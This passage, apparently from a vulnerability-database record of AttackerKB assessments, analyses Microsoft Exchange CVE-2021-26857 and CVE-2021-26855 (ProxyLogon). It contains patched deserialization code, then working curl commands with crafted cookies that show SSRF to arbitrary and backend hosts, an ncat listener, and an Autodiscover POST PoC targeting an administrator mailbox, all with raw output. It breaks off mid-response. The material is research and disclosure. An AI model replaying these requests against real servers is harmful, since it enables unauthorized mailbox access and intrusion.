[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) could be used to write a malicious header file to `C:\\Program Files\\Microsoft\\Exchange Server\\V15\\UnifiedMessaging\\voicemail`, but it\u2019s entirely possible a crafted voicemail could be sent instead. While I haven\u2019t developed a PoC yet, I do have a good idea how to, assuming the patch analysis is correct. Better-resourced attackers should be able to exploit this issue in considerably less time.\n\nThe specifically patched code can be seen below:\n \n \n [snip]\n \t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tException ex = null;\n \t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n \t\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tfinally\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n \t\t\t\t\t\t\t\t\t\t\t\t\tex\n \t\t\t\t\t\t\t\t\t\t\t\t});\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n [snip]\n \n \n \n [snip]\n \t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n \t\t{\n \t\t\ttypeof(Version),\n \t\t\ttypeof(Guid),\n \t\t\ttypeof(PropTag),\n \t\t\ttypeof(ContactInfo),\n \t\t\ttypeof(ADContactInfo),\n \t\t\ttypeof(FoundByType),\n \t\t\ttypeof(ADUser),\n \t\t\ttypeof(ADPropertyBag),\n \t\t\ttypeof(ValidationError),\n \t\t\ttypeof(ADPropertyDefinition),\n \t\t\ttypeof(ADObjectId),\n \t\t\ttypeof(ExchangeObjectVersion),\n \t\t\ttypeof(ExchangeBuild),\n \t\t\ttypeof(MultiValuedProperty<string>),\n \t\t\ttypeof(LocalizedString),\n \t\t\ttypeof(ProxyAddressCollection),\n \t\t\ttypeof(SmtpAddress),\n \t\t\ttypeof(RecipientDisplayType),\n \t\t\ttypeof(RecipientTypeDetails),\n \t\t\ttypeof(ElcMailboxFlags),\n \t\t\ttypeof(UserAccountControlFlags),\n \t\t\ttypeof(ObjectState),\n \t\t\ttypeof(DirectoryBackendType),\n \t\t\ttypeof(MServPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinitionFlags),\n \t\t\ttypeof(OrganizationId),\n \t\t\ttypeof(PartitionId),\n \t\t\ttypeof(SmtpProxyAddress),\n \t\t\ttypeof(SmtpProxyAddressPrefix),\n \t\t\ttypeof(ByteQuantifiedSize),\n \t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n \t\t\ttypeof(List<ValidationError>),\n \t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n \t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n \t\t\ttypeof(StoreObjectId),\n \t\t\ttypeof(StoreObjectType),\n \t\t\ttypeof(EntryIdProvider),\n \t\t\ttypeof(SimpleContactInfoBase),\n \t\t\ttypeof(MultipleResolvedContactInfo),\n \t\t\ttypeof(CallerNameDisplayContactInfo),\n \t\t\ttypeof(PersonalContactInfo),\n \t\t\ttypeof(DefaultContactInfo),\n \t\t\ttypeof(UMDialPlan),\n \t\t\ttypeof(UMEnabledFlags),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n \t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n \t\t\ttypeof(DialByNamePrimaryEnum),\n \t\t\ttypeof(DialByNameSecondaryEnum),\n \t\t\ttypeof(AudioCodecEnum),\n \t\t\ttypeof(UMUriType),\n \t\t\ttypeof(UMSubscriberType),\n \t\t\ttypeof(UMGlobalCallRoutingScheme),\n \t\t\ttypeof(UMVoIPSecurityType),\n \t\t\ttypeof(SystemFlagsEnum),\n \t\t\ttypeof(EumProxyAddress),\n \t\t\ttypeof(EumProxyAddressPrefix)\n \t\t};\n [snip]\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26857", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "href": "https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T17:15:35", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < 